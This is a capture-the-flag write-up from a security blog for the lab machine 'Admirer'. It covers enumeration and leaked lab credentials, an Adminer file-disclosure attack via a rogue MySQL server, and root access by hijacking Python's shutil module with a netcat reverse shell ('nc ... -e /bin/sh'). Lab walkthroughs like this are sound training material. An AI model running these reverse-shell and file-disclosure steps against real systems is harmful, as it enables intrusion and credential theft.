Kashmir54

Cibersecurity blog. CTFs, writeups, electronics and more!

Home Flipper Boards CTF Writeups YouTube View on GitHub

Admirer

Enumeration

+ "robots.txt" contains 1 entry which should be manually viewed.

80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/admin-dir
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Admirer

http://10.10.10.187/robots.txt contains:

User-agent: *

# This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
Disallow: /admin-dir

User: waldo Dir: /admin-dir

We will launch dirbuster with the medium wordlist and checking the directory /admin-dir

##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb

##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb

#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

Lets check out some of the credentials:

On the FTP we can find two files and we retrieve them:

Lets enumerate those files:

-- MySQL dump 10.16  Distrib 10.1.41-MariaDB, for debian-linux-gnu (x86_64)
--
-- Host: localhost    Database: admirerdb
-- ------------------------------------------------------
-- Server version	10.1.41-MariaDB-0+deb9u1

$servername = "localhost";
$username = "waldo";
$password = "Wh3r3_1s_w4ld0?";
...
// TODO: Finish implementing this or find a better open source alternative

<?php
  echo("Just a test to see if PHP works.");
?>

<?php phpinfo(); ?>

$servername = "localhost";
$username = "waldo";
$password = "]F7jLHw:*G>UPrTo}~A"d6b";
$dbname = "admirerdb";
User-agent: *

# This folder contains personal stuff, so no one (not even robots!) should see it - waldo
Disallow: /w4ld0s_s3cr3t_d1r

Making a recap we can try to reach the websites:

http://10.10.10.187/utility-scripts/admin_tasks.php

At the moment I got stucked, no ssh user with any of the passwords, no more hide websites, no bypass on the admin_tasks.php… From the websites I visited, I could see all of them but the db_admin.php, and also the robots.txt was modified, changing /w4ld0s_s3cr3t_d1r to /admin-dir…

On the main website:

<!-- Still under development... This does not send anything yet, but it looks nice! -->

Nothing in the main website, comming back to other comments. From the file db_admin.php:

// TODO: Finish implementing this or find a better open source alternative

Lets find out some open source admin db:

Google: admin db open source We can see Adminer. More like Admirer.

We can check the default webpage for this tool, it appeared inside the utility-script:

http://10.10.10.187/utility-scripts/adminer.php

After trying the different set of passwords showed in different part of the website, no one could work. So knowing the version and the technology, I looked into Google:

This website shows the vulnerability.

Exploitation

Install MySQL if not installed:

sudo apt update
sudo apt install -y wget
wget https://dev.mysql.com/get/mysql-apt-config_0.8.15-1_all.deb
sudo dpkg -i mysql-apt-config_0.8.15-1_all.deb
ubuntu bionic

sudo apt update
sudo apt install mysql-community-server

sudo nano /etc/mysql/mysql.conf.d/mysqld.cnf
+ bind-address    = 0.0.0.0

sudo systemctl enable --now mysql
systemctl status mysql

mysql -u root -p
mysql> create database admirer;
mysql> use admirer;
mysql> create table main(id INT(10));
mysql> SET GLOBAL local_infile=1; (so we can search for files)

Once we have the database up, we will go to the website and place our IP and credentials, which will make the server to call us back to retrieve the database.

If you get an error on login like this one:

Host '10.10.10.187' is not allowed to connect to this MySQL server

You can check out this StackOverflow post telling you about a security measure by default, and remember that is not a great idea to have this kind of users with this kind of privileges open to the internet 0.0.0.0

mysql> CREATE USER 'kashmir'@'localhost' IDENTIFIED BY 'password';
mysql> GRANT ALL PRIVILEGES ON *.* TO 'kashmir'@'localhost'
    ->     WITH GRANT OPTION;
mysql> CREATE USER 'kashmir'@'%' IDENTIFIED BY 'password';
mysql> GRANT ALL PRIVILEGES ON *.* TO 'kashmir'@'%'
    ->     WITH GRANT OPTION;

Once we have all set up, login:

With the code explained in this website we can perform the file disclosure. By placing the file we want and the table we have created, we can retrieve the file.

load data local infile '../index.php'
into table main
fields terminated by "/n"

Clicking into warning we can see the following credentials disclosure:

$servername = "localhost";'
$username = "waldo";
$password = "&<h5b~yK3F#{PaPB&dA}{H>";
$dbname = "admirerdb";' 

We have one more credential so let’s try out the ssh, either way we will go back into the file or login into the adminer (spoiler, those credential didnt work in the adminer login).

Using those credentials on ssh we got access as waldo

user.txt:9ff9185225daf6efd28dc40a07fc4271 

Privilege scalation

We can see waldo can run admin_tasks.sh

admin_tasks.sh has functions to backup the passwd and shadow files, but the privileges of the generated files are only for root, so we got nothing to do there. Before getting into pe tools, we can see a python script with root privileges on the same directory:

And on the admin_tasks.sh we can run we see that the backup.py is executed

#!/bin/bash

backup_web()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running backup script in the background, it might take a while..."
        /opt/scripts/backup.py &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

The python script imports shutil -> make_archive and then call it. We can hijack the library and get arbitrary code executed:

We will create a file with a reverse shell called as the library we want to hijack )shutil.py) and the function it imports (make_archive) with the following content:

waldo@admirer:/opt/scripts$ nano /tmp/shutil.py
import os 

def make_archive(a, b, c):
	os.system('nc 10.10.14.94 4444 -e "/bin/sh"')

Then we can run the script with the PYTHONPATH env variable which determinate where to search the imported libraries with the following command:

waldo@admirer:/opt/scripts$ sudo PYTHONPATH=/tmp /opt/scripts/admin_tasks.sh

Before running the command, get the netcat ready to receive the prompt:

nc -lvnp 4444

Run admin_tasks.sh and the option 6:

Then we take into the netcat and finish the task:

root@admirer:~# cat root.txt    
cat root.txt
5fbc13d34c715f7da061cb8be903ed22